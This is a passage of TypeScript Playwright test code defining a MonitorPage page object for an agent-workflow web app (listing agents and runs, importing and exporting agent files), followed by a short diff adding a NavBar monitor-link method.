schedule: string;
actions: string[];
}
enum ImportType {
AGENT = "agent",
TEMPLATE = "template",
}
export class MonitorPage extends BasePage {
constructor(page: Page) {
super(page);
}
async isLoaded(): Promise<boolean> {
console.log(`checking if monitor page is loaded`);
try {
// Wait for the monitor page
await this.page.getByTestId("monitor-page").waitFor({
state: "visible",
timeout: 10_000,
});
// Wait for table headers to be visible (indicates table structure is ready)
await this.page.locator("thead th").first().waitFor({
state: "visible",
timeout: 15_000,
});
// Wait for either a table row or an empty tbody to be present
await Promise.race([
// Wait for at least one row
this.page.locator("tbody tr[data-testid]").first().waitFor({
state: "visible",
timeout: 15_000,
}),
// OR wait for an empty tbody (indicating no agents but table is loaded)
this.page
.locator("tbody[data-testid='agent-flow-list-body']:empty")
.waitFor({
state: "visible",
timeout: 15_000,
}),
]);
return true;
} catch {
return false;
}
}
async listAgents(): Promise<Agent[]> {
console.log(`listing agents`);
// Wait for table rows to be available
const rows = await this.page.locator("tbody tr[data-testid]").all();
const agents: Agent[] = [];
for (const row of rows) {
// Get the id from data-testid attribute
const id = (await row.getAttribute("data-testid")) || "";
// Get columns - there are 3 cells per row (name, run count, last run)
const cells = await row.locator("td").all();
// Extract name from first cell
const name = (await row.getAttribute("data-name")) || "";
// Extract run count from second cell
const runCountText = (await cells[1].textContent()) || "0";
const runCount = parseInt(runCountText, 10);
// Extract last run from third cell's title attribute (contains full timestamp)
// If no title, the cell will be empty indicating no last run
const lastRunCell = cells[2];
const lastRun = (await lastRunCell.getAttribute("title")) || "";
agents.push({
id,
name,
runCount,
lastRun,
});
}
    // Exclude run rows; only rows whose id does not contain "flow-run" are agents
    return agents.filter((agent) => !agent.id.includes("flow-run"));
}
async listRuns(filter?: Agent): Promise<Run[]> {
console.log(`listing runs`);
// Wait for the runs table to be loaded - look for table header "Agent"
await this.page.locator("[data-testid='flow-runs-list-body']").waitFor({
timeout: 10000,
});
// Get all run rows
const rows = await this.page
.locator('tbody tr[data-testid^="flow-run-"]')
.all();
const runs: Run[] = [];
for (const row of rows) {
const runId = (await row.getAttribute("data-runid")) || "";
const agentId = (await row.getAttribute("data-graphid")) || "";
// Get columns
const cells = await row.locator("td").all();
// Parse data from cells
const agentName = (await cells[0].textContent()) || "";
const started = (await cells[1].textContent()) || "";
const status = (await cells[2].locator("div").textContent()) || "";
const duration = (await cells[3].textContent()) || "";
// Only add if no filter or if matches filter
if (!filter || filter.id === agentId) {
runs.push({
id: runId,
agentId: agentId,
agentName: agentName.trim(),
started: started.trim(),
duration: parseFloat(duration.replace("s", "")),
status: status.toLowerCase().trim(),
});
}
}
return runs;
}
async listSchedules(): Promise<Schedule[]> {
console.log(`listing schedules`);
return [];
}
async clickAgent(id: string) {
console.log(`selecting agent ${id}`);
await this.page.getByTestId(id).click();
}
async clickCreateAgent(): Promise<void> {
console.log(`clicking create agent`);
await this.page.getByRole("link", { name: "Create" }).click();
}
async importFromFile(
directory: string,
file: string,
name?: string,
description?: string,
importType: ImportType = ImportType.AGENT,
) {
console.log(
`importing from directory: ${directory} file: ${file} name: ${name} description: ${description} importType: ${importType}`,
);
await this.page.getByTestId("create-agent-dropdown").click();
await this.page.getByTestId("import-agent-from-file").click();
await this.page
.getByTestId("import-agent-file-input")
.setInputFiles(path.join(directory, file));
if (name) {
console.log(`filling agent name: ${name}`);
await this.page.getByTestId("agent-name-input").fill(name);
}
if (description) {
console.log(`filling agent description: ${description}`);
await this.page.getByTestId("agent-description-input").fill(description);
}
if (importType === ImportType.TEMPLATE) {
console.log(`clicking import as template switch`);
await this.page.getByTestId("import-as-template-switch").click();
}
console.log(`clicking import agent submit`);
await this.page.getByTestId("import-agent-submit").click();
}
async deleteAgent(agent: Agent) {
console.log(`deleting agent ${agent.id} ${agent.name}`);
}
async clickAllVersions(agent: Agent) {
console.log(`clicking all versions for agent ${agent.id} ${agent.name}`);
}
async openInBuilder(agent: Agent) {
console.log(`opening agent ${agent.id} ${agent.name} in builder`);
}
async exportToFile(agent: Agent) {
await this.clickAgent(agent.id);
console.log(`exporting agent id: ${agent.id} name: ${agent.name} to file`);
await this.page.getByTestId("export-button").click();
}
async selectRun(agent: Agent, run: Run) {
console.log(`selecting run ${run.id} for agent ${agent.id} ${agent.name}`);
}
async openOutputs(agent: Agent, run: Run) {
console.log(
`opening outputs for run ${run.id} of agent ${agent.id} ${agent.name}`,
);
}
}

View File

@@ -8,6 +8,10 @@ export class NavBar {
await this.page.getByRole("link", { name: "Edit profile" }).click();
}
async clickMonitorLink() {
await this.page.getByTestId("navbar-link-library").click();
}
async clickBuildLink() {
const link = this.page.getByTestId("navbar-link-build");
await link.waitFor({ state: "visible", timeout: 15000 });